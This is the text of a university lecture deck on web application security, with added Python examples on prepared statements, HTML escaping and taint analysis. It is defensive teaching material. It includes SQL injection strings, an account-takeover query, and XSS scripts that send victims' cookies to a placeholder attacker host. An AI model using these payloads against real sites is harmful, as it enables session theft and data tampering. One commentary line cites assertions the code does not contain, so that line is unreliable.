Presentation 14 PDF

This document discusses analysis of web application security. It begins by outlining common vulnerabilities like SQL injection and compromised websites. The document then discusses prevention methods like input validation and automated analysis tools. The objectives are outlined as improving current prevention and detection methods. The approach involves developing a new tool called CANTU for analyzing PHP and JavaScript code to detect vulnerabilities.


Analysis of Web Application Security

Yih-Kuen Tsay (蔡益坤)
Dept. of Information Management
National Taiwan University
Joint work with Chen-I Chung, Chih-Pin Tai, Chen-Ming Yao, Rui-Yuan Yeh, and Sheng-Feng Yu
2012/11/28 @ JST
Caveats
• Concerned mainly with security problems resulting from program defects
• Will use PHP and JavaScript for illustration, though there are many other languages
• Means of analysis in general
  - Testing and simulation
  - Formal verification
    - Algorithmic: static analysis, model checking
    - Deductive: theorem proving
  - Manual code review
2012/11/28 @ JST Analysis of Web Application Secuirty 2
Personal Perspective
• I am a formal verification person, seeking practical uses of my expertise.
• Web application security is one of the very few practical domains where programmers find program analyzers useful/indispensable.
• There are challenging problems unsolved by current commercial tools.

Outline
• Introduction
• Common Vulnerabilities and Defenses
• Objectives and Challenges
• Opportunities
• Our Approach: CANTU
• Conclusion

How the Web Works
(Diagram of the client side, with the user and the browser, and the server side, reconstructed as numbered steps.)
1. The user interacts with the browser.
2. The browser sends a request for a Web page.
3. The server retrieves/generates the page, possibly using data from the database and adding client-side scripts to enrich functionalities.
4. The page is delivered as HTML + scripts.
5. The browser displays the page and executes the client-side scripts on the page.
Note: cookies or the equivalent are typically used for maintaining sessions.
Web Applications
• Web applications refer mainly to the application programs running on the server.
• Part of a Web application may run on the client.
• Together, they make the Web interactive, convenient, and versatile.
• Online activities enabled by Web applications:
  - Hotel/transportation reservation,
  - Banking, social networks, etc.
• As such, Web applications often involve the user's private and confidential data.
Web Applications: Dynamic Contents
<?
$link = mysql_connect('localhost', 'username', 'password');  // connect to database
$db = mysql_select_db('dbname', $link);

fixInput();  // invoke a user-defined sanitization function to validate all inputs

$user = $_POST['account'];

// fetch and display account information
$query = "SELECT id, name, description FROM project WHERE user_account='" . $user . "'";
$query_result = mysql_query($query);
while ($result = mysql_fetch_row($query_result)) {
    echo '<table>';
    echo '<tr>';
    echo '<td width="100px">' . $result[0] . '</td>';
    echo '<td width="100px">' . $result[1] . '</td>';
    echo '<td width="100px">' . $result[2] . '</td>';
    echo '</tr>';
    echo '</table>';
}
?>
Web Applications: Client-Side Script
<html>
<head>
<title>Example 2</title>
<script type='text/javascript'>
function submit_form(){
    // only submit when the account field is non-empty
    if(document.getElementById('user_account').value != ""){
        document.getElementById('project_form').submit();
    }
}
</script>
</head>
<body>
<form id='project_form' action='my_project.php' method='POST'>
<input type='text' name='user_account' id='user_account' />
<input type='button' value='OK' onclick='submit_form();' />
<input type='reset' value='Reset' />
</form>
</body>
</html>
Vulnerable Web Applications
• Many Web applications have security vulnerabilities that may be exploited by the attacker.
• Most security vulnerabilities are a result of bad programming practices or programming errors.
• The possible damages:
  - Your personal data get stolen.
  - Your website gets infected or sabotaged.
  - These may bear financial or legal consequences.
A Common Vulnerability: SQL Injection

• User's inputs are used as parts of an SQL query, without being checked/validated.
• Attackers may exploit the vulnerability to read, update, create, or delete arbitrary data in the database.
• Example (display all users' information):
  - Relevant code in a vulnerable application:
    $sql = "SELECT * FROM users WHERE id = '" . $_GET['id'] . "'";
  - The attacker types in 0' OR '1' = '1 as the input for id.
  - The actual query executed:
    SELECT * FROM users WHERE id = '0' OR '1' = '1';
  - So, the attacker gets to see every row from the users table.
SQL Injection (cont.)
(Sequence diagram among a User, the Vulnerable Website, and an Attacker, reconstructed as text.)
Normal user:
1. Send an HTTP request with id = 1128.
2. The server returns the user data with id=1128 (SQL query: SELECT * FROM user WHERE id='1128';).
Attacker:
1. Send an HTTP request with id = 0' OR '1'='1
2. The server returns all tuples in the user table (SELECT * FROM user WHERE id='0' OR '1'='1';).
Legend: the diagram distinguishes messages the user is aware of from messages the user is unaware of.
Compromised Websites
• Compromised legitimate websites can introduce malware and scams.
• Compromised sites of 2010 include
  - the European site of popular tech blog TechCrunch,
  - news outlets like the Jerusalem Post, and
  - local government websites like that of the U.K.'s Somerset County Council.
• 30,000 new malicious URLs every day.

Source: Sophos security threat report 2011
Compromised Websites (cont.)
• More than 70% of those URLs are legitimate websites that have been hacked or compromised.
• Criminals gain access to the data on a legitimate site and subvert it to their own ends.
• They achieve this by
  - exploiting vulnerabilities in the software that powers the sites or
  - by stealing access credentials from malware-infected machines.
Source: Sophos security threat report 2011
Prevention
• Properly configure the server
• Use secure application interfaces
• Validate (sanitize) all inputs from the user and even the database
• Apply detection/verification tools and repair errors before deployment
  - Commercial tools
  - Free tools from research laboratories

Outline
• Introduction
• Common Vulnerabilities and Defenses
• Objectives and Challenges
• Opportunities
• Our Approach: CANTU
• Conclusion

OWASP Top 10 Application Security Risks

• Injection
• Cross-Site Scripting (XSS)
• Broken Authentication and Session Management
• Insecure Direct Object Reference
• Cross-Site Request Forgery (CSRF)
• Security Misconfiguration
• Insecure Cryptographic Storage
• Failure to Restrict URL Access
• Insufficient Transport Layer Protection
• Unvalidated Redirects and Forwards

What Changed from 2007 to 2010
(Figure comparing the 2007 and 2010 OWASP Top 10 lists; the figure itself is not recoverable from the text.)

SQL Injection (cont.)
• Example: a "Forgot Password" form
  Email: [          ]
  We will send your account information to your email address.
  Relevant code:
  $sql = "SELECT login_id, passwd, full_name, email FROM users WHERE email = '" . $_GET['email'] . "'";
• The attacker may set things up to steal the account of Bob ([email protected]) by fooling the server into executing:
  SELECT login_id, passwd, full_name, email FROM users WHERE email = 'x';
  UPDATE users SET email = '[email protected]' WHERE email = '[email protected]';
Defenses against SQL Injection in PHP
• Sources (where tainted data come from)
  - $_GET, $_POST, $_SERVER, $_COOKIE, $_FILES, $_REQUEST, $_SESSION
• Sinks (where tainted data should not be used)
  - mysql_query(), mysql_create_db(), mysql_db_query(), mysql_drop_db(), mysql_unbuffered_query()
• Defenses
  - Parameter: magic_quotes_gpc
  - Built-in function: addslashes
  - Prepared statements (for database accesses)
Defenses against SQL Injection (cont.)
• Set the magic_quotes_gpc parameter on in the PHP configuration file.
  - When the parameter is on, ' (single quote), " (double quote), \ (backslash) and NULL characters are escaped with a backslash automatically.
• Built-in function: addslashes( string $str )
  - The same effect as setting magic_quotes_gpc on
<?php
$str = "Is your name O'Brien?";
echo addslashes($str);
// Output: Is your name O\'Brien?
?>

Defenses against SQL Injection (cont.)
• Prepared statements
  - Set up a statement once, and then execute it many times with different parameters.
  - Example:
$db_connection = new mysqli("localhost", "user", "pass", "db");
$statement = $db_connection->prepare("SELECT * FROM users WHERE id = ?");
$statement->bind_param("i", $id);
$statement->execute(); ...

  - To execute the above query, one needs to supply the actual value for ? (which is called a placeholder).
  - The first argument of bind_param() is the input's type: i for int, s for string, d for double
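Added example (Python with the standard sqlite3 module, not code from the presentation or from CANTU): the string-built query from the "A Common Vulnerability: SQL Injection" slide beside the placeholder form from the prepared-statements slide, run against a constructed three-row users table. sqlite3's ? placeholder plays the role of mysqli's ?; the table contents and the lookup functions are constructed for this example. The placeholder form does not depend on escaping rules at all, which matters because magic_quotes_gpc was deprecated in PHP 5.3 and removed in PHP 5.4.

```python
"""Vulnerable string-concatenated query vs. placeholder query (sqlite3).
Constructed example; not the presentation's or CANTU's code."""
import sqlite3


def make_db():
    """In-memory users table with three constructed rows (ids stored as text,
    matching the quoted id = '1128' on the slides)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, login_id TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [
            ("1128", "alice", "alice@example.invalid"),
            ("1129", "bob", "bob@example.invalid"),
            ("1130", "carol", "carol@example.invalid"),
        ],
    )
    return conn


def lookup_concat(conn, user_id):
    """The vulnerable pattern from the slides: the input is pasted into the SQL
    text, so a quote inside the input changes the structure of the query."""
    sql = "SELECT login_id FROM users WHERE id = '" + user_id + "' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_prepared(conn, user_id):
    """The defended pattern: the ? placeholder is bound after the statement is
    parsed, so the input is only ever compared as a value."""
    sql = "SELECT login_id FROM users WHERE id = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (user_id,))]


if __name__ == "__main__":
    conn = make_db()
    for inp in ["1128", "0' OR '1'='1"]:
        print(repr(inp), "concat:", lookup_concat(conn, inp),
              "prepared:", lookup_prepared(conn, inp))
```

With the benign id both functions return the one matching row; with the slide's input 0' OR '1'='1 the concatenated query returns every row while the placeholder query returns none, because no id literally equals that string.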
Cross-Site Scripting (XSS)
• The server sends unchecked/unvalidated data to the user's browser.
• Attackers may exploit the vulnerability to execute client-side scripts to:
  - Hijack user sessions
  - Deface websites
  - Conduct phishing attacks
• Types of cross-site scripting:
  - Stored XSS
  - Reflected XSS

Stored XSS
(Sequence diagram among the Attacker, the Vulnerable Website, and the Victim, reconstructed as text.)
1. The attacker posts a malicious message onto the bulletin board:
   <script>document.location="http://attackersite/collect.cgi?cookie=" + document.cookie;</script>
2. The victim sends a logon request to the website.
3. The website replies with Set-Cookie: ...
4. The victim reads the bulletin board.
5. The website shows the malicious script (the same <script> block as in step 1) to the victim's browser.
6. The victim's browser runs the script and transmits the cookie to the attacker.
Legend: the diagram distinguishes messages the victim is aware of from messages the victim is unaware of.
Reflected XSS
(Sequence diagram among the Attacker, the Vulnerable Website, and the Victim, reconstructed as text.)
1. The victim sends a logon request to the vulnerable website.
2. The website replies with Set-Cookie: ID=A12345.
3. The victim, by clicking unwittingly, requests a link to the attacker's site.
4. and 5. The attacker's site returns a page (the same HTML appears at both steps on the slide) containing a link to the vulnerable site whose name parameter carries a script:
   <HTML>
   <a href='http://vulnerablesite/welcome.cgi?name=<script>window.open(%27http://attackersite/collect.cgi?cookie=%27%2Bdocument.cookie);</script>'>vulnerablesite</a>
6. The victim follows the link; the vulnerable site reflects the name parameter into its welcome page:
   <HTML>
   <Title>Welcome!</Title>Hi <script>window.open('http://attackersite/collect.cgi?cookie='+document.cookie);</script>
7. The victim's browser runs the script and requests http://attackersite/collect.cgi?cookie=ID=A12345 (cookie stolen by the attacker).
Legend: the diagram distinguishes messages the victim is aware of from messages the victim is unaware of.
Defenses against Cross-Site Scripting in PHP

• Sources (assumption: the database is not tainted)
  - $_GET, $_POST, $_SERVER, $_COOKIE, $_FILES, $_REQUEST, $_SESSION
• More sources (assumption: the database is tainted)
  - mysql_fetch_array(), mysql_fetch_field(), mysql_fetch_object(), mysql_fetch_row(), ...
• Sinks
  - echo, printf, ...
• Defenses
  - htmlspecialchars()
  - htmlentities()
Defenses against Cross-Site Scripting (cont.)
• Built-in function: htmlspecialchars( string $str [, int $quote_style = ENT_COMPAT] )
  - Convert special characters to HTML entities
    - '&' (ampersand) becomes '&amp;'
    - '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set.
    - ''' (single quote) becomes '&#039;' only when ENT_QUOTES is set.
    - '<' (less than) becomes '&lt;'
    - '>' (greater than) becomes '&gt;'

<?php
$new = htmlspecialchars("<a href='test'>Test</a>", ENT_QUOTES);
echo $new; // &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt;
?>
Defenses against Cross-Site Scripting (cont.)

• Built-in function: htmlentities( string $string [, int $quote_style = ENT_COMPAT] )
  - The same effect as the built-in function htmlspecialchars() (for the characters listed above)
<?php
$orig = "I'll \"walk\" the <b>dog</b> now";
$a = htmlentities($orig);
$b = html_entity_decode($a);
echo $a; // I'll &quot;walk&quot; the &lt;b&gt;dog&lt;/b&gt; now
echo $b; // I'll "walk" the <b>dog</b> now
?>

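Added example (Python, not code from the presentation or from CANTU): a re-implementation of the htmlspecialchars() quote modes described on the two preceding slides, checked against the slides' own inputs and outputs, then applied to the stored-XSS payload shape from the bulletin-board diagram. The constant values match PHP's (ENT_NOQUOTES = 0, ENT_COMPAT = 2, ENT_QUOTES = 3); html_entity_decode() is mapped to Python's html.unescape, and the render_message()/render_link_title() helpers, the PAYLOAD string and payload_is_inert() are constructed for this example.

```python
"""htmlspecialchars() quote modes, re-implemented to show what each mode
escapes and why the output context decides which mode is needed.
Constructed example; not the presentation's or CANTU's code."""
import html

# Same numeric values as PHP's constants.
ENT_NOQUOTES = 0
ENT_COMPAT = 2
ENT_QUOTES = 3


def htmlspecialchars(s, quote_style=ENT_COMPAT):
    """Mirror of PHP htmlspecialchars(): & < > always; " unless ENT_NOQUOTES;
    ' only with ENT_QUOTES (encoded as &#039;, as PHP does)."""
    out = []
    for ch in s:
        if ch == "&":
            out.append("&amp;")
        elif ch == "<":
            out.append("&lt;")
        elif ch == ">":
            out.append("&gt;")
        elif ch == '"' and quote_style != ENT_NOQUOTES:
            out.append("&quot;")
        elif ch == "'" and quote_style == ENT_QUOTES:
            out.append("&#039;")
        else:
            out.append(ch)
    return "".join(out)


def html_entity_decode(s):
    """Counterpart of PHP html_entity_decode(); html.unescape understands the
    named and numeric entities produced above."""
    return html.unescape(s)


def render_message(msg):
    """Bulletin-board output in a text context (between tags): the default
    ENT_COMPAT mode is enough, since ' cannot end a text node."""
    return "<td>" + htmlspecialchars(msg) + "</td>"


def render_link_title(title):
    """Output inside a single-quoted attribute: ENT_QUOTES is required here,
    because with ENT_COMPAT a ' in the value would survive and end the attribute."""
    return "<a href='/view' title='" + htmlspecialchars(title, ENT_QUOTES) + "'>view</a>"


# Constructed input with the shape of the stored-XSS message on the slides.
PAYLOAD = ('<script>document.location="http://attackersite/collect.cgi?cookie="'
           '+document.cookie;</script>')


def payload_is_inert(rendered):
    """True when no raw <script> tag survives in the rendered HTML."""
    return "<script" not in rendered and "</script" not in rendered


if __name__ == "__main__":
    print(render_message(PAYLOAD))
    print(render_link_title("O'Brien's page"))
```

The first two assertions reproduce the outputs printed on the slides; the last two show the caveat that the quote mode must match the output context: ENT_COMPAT leaves the single quote intact, which is harmless in text but not inside a single-quoted attribute.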
Outline
• Introduction
• Common Vulnerabilities and Defenses
• Objectives and Challenges
• Opportunities
• Our Approach: CANTU
• Conclusion

Current Status
• Most known Web application security vulnerabilities can be fixed.
• There are code analysis tools that can help to detect such security vulnerabilities.
• So, what are the problems?

An Example
PHP code
01  <?php
02      $id = $_POST["id"];
03      $dept = $_POST["dept"];
04      if ($dept == 0) {                 // guest
05          echo "Hello! guest";
06          displayWelcomePage();
07      }
08      else {                            // staff
09          if ($id == "admin") {
10              echo "Hello! ".$id;
11              displayManagementFun();
12          }
13          else {
14              echo "Hello! ".$dept.$id;
15              displayBasicFun();
16          }
17      }
18  ?>
Control Flow Graph
(Figure, reconstructed as text.)
02: $id = $_POST["id"];
03: $dept = $_POST["dept"];
$dept == 0 ?
  True:
    05: echo "Hello! guest";
    06: displayWelcomePage();
  False:
    $id == "admin" ?
      True:
        10: echo "Hello! ".$id;
        11: displayManagementFun();
      False:
        14: echo "Hello! ".$dept.$id;
        15: displayBasicFun();
Exit
Dependency Graph (1/3)
(Figure for the path through 02, 03, the True branch of $dept == 0, 05, 06, Exit, reconstructed as text; each node is "value, line" with its taint label.)
02: $id = $_POST["id"];
03: $dept = $_POST["dept"];
Nodes: $_POST["dept"], 3 (Untainted); $_POST["id"], 2 (Tainted)
Nodes: "Hello! guest", 5 (Untainted); $dept, 3 (Untainted); $id, 2 (Tainted)
Branch: $dept == 0 -> True
05: echo "Hello! guest";  -> echo, 5 (Untainted)
06: displayWelcomePage();
Exit

Dependency Graph (2/3)
(Figure for the path through 02, 03, the False branch of $dept == 0, the True branch of $id == "admin", 10, 11, Exit, reconstructed as text.)
02: $id = $_POST["id"];
03: $dept = $_POST["dept"];
Nodes: $_POST["dept"], 3 (Tainted); $_POST["id"], 2 (Tainted)
Nodes: "Hello! ", 10 (Untainted); $dept, 3 (Tainted); $id, 2 (Tainted)
Branch: $dept == 0 -> False
Branch: $id == "admin" -> True
str_concat, 10 (Tainted)  <- "Hello! ", 10 and $id, 2
10: echo "Hello! ".$id;  -> echo, 10 (Tainted)
11: displayManagementFun();
Exit
Note: a better analysis would take into account $id == "admin".
Dependency Graph (3/3)
(Figure for the path through 02, 03, the False branch of $dept == 0, the False branch of $id == "admin", 14, 15, Exit, reconstructed as text.)
02: $id = $_POST["id"];
03: $dept = $_POST["dept"];
Nodes: $_POST["dept"], 3 (Tainted); $_POST["id"], 2 (Tainted)
Nodes: "Hello! ", 14 (Untainted); $dept, 3 (Tainted); $id, 2 (Tainted)
Branch: $dept == 0 -> False
Branch: $id == "admin" -> False
str_concat, 14 (Tainted)  <- "Hello! ", 14 and $dept, 3
str_concat, 14 (Tainted)  <- the previous str_concat and $id, 2
14: echo "Hello! ".$dept.$id;  -> echo, 14 (Tainted)
15: displayBasicFun();
Exit
Alias
PHP code
01  <?php
02      $a = "message";
03      $b = &$a;
04      $a = $_GET["msg"];
05      echo $b;
06  ?>
Dependency graph (reconstructed as text): $_GET["msg"], 4 (Tainted) -> $a, 4 (Tainted); $a, 4 and $b, 3 (Tainted) are joined by an alias edge; $b, 3 -> echo, 5 (Tainted).
Alias information: must-alias {(a, b)}

Detecting Vulnerabilities by Taint Analysis

• All inputs from a source are considered tainted.
• Data that depend on tainted data are also considered tainted.
• Some functions may be designated as sanitization functions (for particular security vulnerabilities).
• Values returned from a sanitization function are considered clean or untainted.
• Report vulnerabilities when tainted values are used in a sink.
Problems and Objectives
• Four problems (among others) remain:
  - Existing code analysis tools report too many false positives.
  - They rely on the programmer to ensure the correctness of sanitization functions.
  - Many tools report false negatives in some cases.
  - Web application languages/frameworks are numerous and hard to keep up with.
• We aim to solve the first three problems and alleviate the fourth.
Use of a Code Analysis Tool
(Workflow figure, reconstructed as text.)
Website -> source code and Web pages -> code analysis tool -> analysis results -> manual review -> analysis report -> review meeting -> improvement recommendations -> Website
Note: fewer false positives means less workload for the human reviewer.
Note: there may be possible feedback loops between two tasks.
Challenges
• Dynamic features of scripting languages popular for Web application development:
  - Dynamic typing
  - Dynamic code generation and inclusion
• Other difficult language features:
  - Aliases and hash tables
  - Strings and numerical quantities
• Interactions between client-side code, server-side code, databases, and system configurations
• Variation in browser and server behaviors
Challenges: Alias Analysis
• In PHP, aliases may be introduced by using the reference operator "&".
PHP Code (left)
<?php
$a = "test";         // $a: untainted
$b = &$a;            // $a, $b: untainted
$a = $_GET["msg"];   // $a, $b: tainted.
echo $b;             // XSS vulnerability
?>
  Tool A: false negative
  Tool B: true positive

PHP Code (right)
<?php
$a = "test";         // $a: untainted
$b = &$a;            // $a, $b: untainted
grade();
function grade()
{
    $a = $_GET["msg"];   // $a, $b: tainted.
}
echo $b;             // XSS vulnerability
?>
  Tool A: false negative
  Tool B: false negative

Note: Tool A and Tool B are two popular commercial code analysis tools.
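Added example (Python, not code from the presentation or from CANTU): a small forward taint analysis in the style of the "Detecting Vulnerabilities by Taint Analysis" slide, with must-alias tracking so that the left-hand program on this slide is reported. Taint is kept per alias class and per vulnerability kind, so a sanitizer for one kind (addslashes) does not clear the other (XSS). The three-address IR, the source/sink/sanitizer tables and the two programs are constructed for this example; the analysis is straight-line and path-insensitive, so it does not attempt the refinement noted under Dependency Graph (2/3).

```python
"""Forward taint analysis with must-alias classes over a tiny straight-line IR.
Constructed example; not the presentation's or CANTU's code."""
from typing import Dict, List, Set, Tuple

ALL_KINDS = frozenset({"XSS", "SQLi"})
SOURCES = {"$_GET", "$_POST", "$_SERVER", "$_COOKIE", "$_FILES", "$_REQUEST", "$_SESSION"}
SINKS = {"echo": "XSS", "printf": "XSS", "mysql_query": "SQLi"}
SANITIZERS = {"htmlspecialchars": "XSS", "htmlentities": "XSS", "addslashes": "SQLi"}


class TaintState:
    """Taint is stored per alias class, so a write through any name in a
    must-alias set (e.g. after $b = &$a) is visible through every other name."""

    def __init__(self) -> None:
        self.cls: Dict[str, int] = {}         # variable name -> alias class id
        self.taint: Dict[int, Set[str]] = {}  # alias class id -> vulnerability kinds
        self._next = 0

    def _class(self, var: str) -> int:
        if var not in self.cls:
            self.cls[var] = self._next
            self.taint[self._next] = set()
            self._next += 1
        return self.cls[var]

    def get(self, var: str) -> Set[str]:
        return self.taint[self._class(var)]

    def set(self, var: str, kinds) -> None:
        self.taint[self._class(var)] = set(kinds)

    def make_ref(self, dst: str, src: str) -> None:
        # dst = &src: dst now names src's storage; its previous binding is dropped
        self.cls[dst] = self._class(src)


def analyze(program: List[Tuple]) -> List[Tuple[int, str, str, str]]:
    """Walk an IR of (line, op, args...) tuples and report tainted sink uses."""
    st = TaintState()
    findings = []
    for line, op, *args in program:
        if op == "const":            # $x = "literal"
            st.set(args[0], ())
        elif op == "input":          # $x = $_GET[...]: tainted for every kind
            dst, source = args
            st.set(dst, ALL_KINDS if source in SOURCES else ())
        elif op == "copy":           # $x = $y
            st.set(args[0], st.get(args[1]))
        elif op == "ref":            # $x = &$y
            st.make_ref(args[0], args[1])
        elif op == "concat":         # $x = $y . $z . ...: union of operand taint
            dst, *parts = args
            st.set(dst, set().union(*(st.get(p) for p in parts)))
        elif op == "call":           # $x = f($y): a sanitizer clears only its own kind,
            dst, fn, arg = args      # any other function propagates taint unchanged
            kinds = set(st.get(arg))
            kinds.discard(SANITIZERS.get(fn))
            st.set(dst, kinds)
        elif op == "sink":           # echo $x / mysql_query($x)
            fn, arg = args
            kind = SINKS[fn]
            if kind in st.get(arg):
                findings.append((line, kind, fn, arg))
        else:
            raise ValueError(f"unknown op {op!r} at line {line}")
    return findings


# The left-hand program on the alias slide: $b aliases $a, $a is overwritten
# from $_GET, $b is echoed.
ALIAS_PROGRAM = [
    (2, "const", "$a"),
    (3, "ref", "$b", "$a"),
    (4, "input", "$a", "$_GET"),
    (5, "sink", "echo", "$b"),
]

# Constructed variant of the dynamic-contents slide: the query is built from
# $_POST once raw and once through addslashes(); addslashes() is not an XSS
# sanitizer, so echoing its result still fires.
SANITIZE_PROGRAM = [
    (1, "input", "$user", "$_POST"),
    (2, "const", "$prefix"),
    (3, "concat", "$query", "$prefix", "$user"),
    (4, "sink", "mysql_query", "$query"),
    (5, "call", "$safe", "addslashes", "$user"),
    (6, "concat", "$query2", "$prefix", "$safe"),
    (7, "sink", "mysql_query", "$query2"),
    (8, "sink", "echo", "$safe"),
]

if __name__ == "__main__":
    for name, prog in [("alias", ALIAS_PROGRAM), ("sanitize", SANITIZE_PROGRAM)]:
        print(name, analyze(prog))
```

Without the alias class (if make_ref were replaced by a plain copy) the echo at line 5 of ALIAS_PROGRAM would go unreported, which is exactly the false negative the slide attributes to Tool A.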
Challenges: Alias Analysis (cont.)
• None of the existing tools (that we have tested) handles aliases between objects.
PHP Code
<?php
class car {
    var $color;
    function set_color($c) {
        $this->color = $c;
    }
}
$mycar = new car;
$mycar->set_color("blue");
$a_mycar = &$mycar;
$a_mycar->set_color("<script>alert('xss')</script>");
echo $mycar->color . "<br>";   // tainted through the alias $a_mycar
?>
Challenges: Strings and Numbers
1   if($_GET['mode'] == "add"){
2       if(!isset($_GET['msg']) || !isset($_GET['poster'])){
3           exit;
4       }
5       $my_msg = $_GET['msg'];
6       $my_poster = $_GET['poster'];
7       if (strlen($my_msg) > 100 && !ereg("script", $my_msg)){
8           echo "Thank you for posting the message $my_msg";
9       }
10  }
11  ...

• To exploit the XSS vulnerability at line 8, we have to generate input strings satisfying the conditions at lines 1, 2, and 7, which involve both string and numeric constraints.
Challenges: A Theoretical Limitation
• Consider the class of programs with:
  - Assignment
  - Sequencing, conditional branch, goto
  - At least three string variables
  - String concatenation (or even just appending a symbol to a string)
  - Equality testing between two string variables
• The Reachability Problem for this class of programs is undecidable.

Outline
• Introduction
• Common Vulnerabilities and Defenses
• Objectives and Challenges
• Opportunities
• Our Approach: CANTU
• Conclusion

Research Opportunities
• Advanced and integrated program analyses
• Formal certification of Web applications
• Development methods (including language design) for secure Web applications
• A completely new and secure Web (beyond http-related protocols)

Business Opportunities: Code Review/Analysis Service
• This requires a combination of knowledge
  - Security domain
  - Program analysis
  - Program testing
  - Review process
• There are real and growing demands!
• A few industry and academic groups are building up their capabilities.

Outline
• Introduction
• Common Vulnerabilities and Defenses
• Objectives and Challenges
• Opportunities
• Our Approach: CANTU
• Conclusion

CANTU (Code Analyzer from NTU)
• It is an integrated environment for analyzing Web applications.
• Main features:
  - Building on CIL, to treat different languages and frameworks
  - Dataflow analysis across client, server, database, and system configurations
  - Incorporating dynamic analysis to confirm true positives

Architecture of CANTU
(Block diagram, reconstructed as text.)
Front ends: PHP parser, HTML parser, JavaScript parser, SQL parser, database translator, configuration translator
  -> CIL Intermediate Representation
Static analysis: dataflow analysis -> vulnerability detection
Dynamic testing: test case generation -> vulnerability confirmation
  -> Analysis results

Components of Static Analysis
(Block diagram, reconstructed as text.)
PHP Web applications -> Parse PHP to C AST
Python Web applications -> Parse Python to C AST
Other Web applications -> Parse ... to C AST
  -> C abstract syntax tree
  -> Convert C AST to CIL
  -> CIL intermediate representation
  -> Taint analysis: data flow analysis, sanitization function verification, HTML validation, other static analyses
  -> Integrated analysis results

Representing PHP Variables in CIL
struct array {
    struct hashtable *val;
    struct hashtable *index;
};
union mixed {
    short bval;
    long inum;
    double fnum;
    char *str;
    struct array arr;
    void *object;
    char *resource;
};
struct variable {
    enum phpt {BOOL, INT, FLOAT, STR, ARRAY, OBJECT, RESOURCE, NULLType} val_type;
    union mixed val;
};
Executing Generated Tests
(Client/server figure of a generated test case being run, reconstructed as text from the slide's fragments.)
Client side:
  CANTU, Project: project1; Vul: 1. XSS (testcase1), 2. SQL injection (testcase2)
  runTest.php: redirect to the entry page
    redirect("a.php");
  a.php: original code plus instrument code
    <!-- instrument code -->
    <script src="simulate.js"></script>
  simulate.js: uses the ajax method to get test info, then manipulates the webpage
Server side:
  instrument javascript code
  getStep.php: get a test step
  verify.php: verify
  testcase1.xml:
    <TestCase>
      <vulnerability>Reflected XSS</vulnerability>
      <precondition></precondition>
      <scenario>
        <step>
          <id>1</id>
          <page>a.php</page>
          <action>browse</action>
          <target></target>
          <typingString></typingString>
        </step>
        ...
      </scenario>
      <expectedValue>
        <type>document.title</type>
        <info>XSS</info>
      </expectedValue>
      <result></result>
    </TestCase>
Outline
• Introduction
• Common Vulnerabilities and Defenses
• Objectives and Challenges
• Opportunities
• Our Approach: CANTU
• Conclusion

Conclusion
• Web application security has drawn much attention from the public, the industry, and academia.
• Making Web applications secure requires a combination of expertise in different areas.
• This provides great opportunities for research/development collaboration.
  - CANTU represents our vision of this collaboration.
• It should also create good opportunities for starting new businesses.
Selected References
• Huang et al., "Securing Web Application Code by Static Analysis and Runtime Protection," WWW 2004.
• Minamide, "Static Approximation of Dynamically Generated Web Pages," WWW 2005.
• Xie and Aiken, "Static Detection of Security Vulnerabilities in Scripting Languages," USENIX Security Symposium 2006.
• Su and Wassermann, "The Essence of Command Injection Attacks in Web Applications," POPL 2006.
• Chess and West, Secure Programming with Static Analysis, Pearson Education, Inc. 2007.
Selected References (cont.)
• Lam et al., "Securing Web Applications with Static and Dynamic Information Flow Tracking," PEPM 2008.
• Yu et al., "Verification of String Manipulation Programs Using Multi-Track Automata," Tech Report, UCSB, 2009.
• Yu et al., "Generating Vulnerability Signatures for String Manipulating Programs Using Automata-based Forward and Backward Symbolic Analyses," IEEE/ACM ICASE 2009.
• Kiezun et al., "Automatic Creation of SQL Injection and Cross-Site Scripting Attacks," ICSE 2009.
Selected References (cont.)
• OWASP, http://www.owasp.org/.
• The CVE Site, http://cve.mitre.org/.
• C.-P. Tai, An Integrated Environment for Analyzing Web Application Security, Master's Thesis, NTU, 2010.
• R.-Y. Yeh, An Improved Static Analyzer for Verifying PHP Web Application Security, Master's Thesis, NTU, 2010.
• S.-F. Yu, Automatic Generation of Penetration Test Cases for Web Applications, Master's Thesis, NTU, 2010.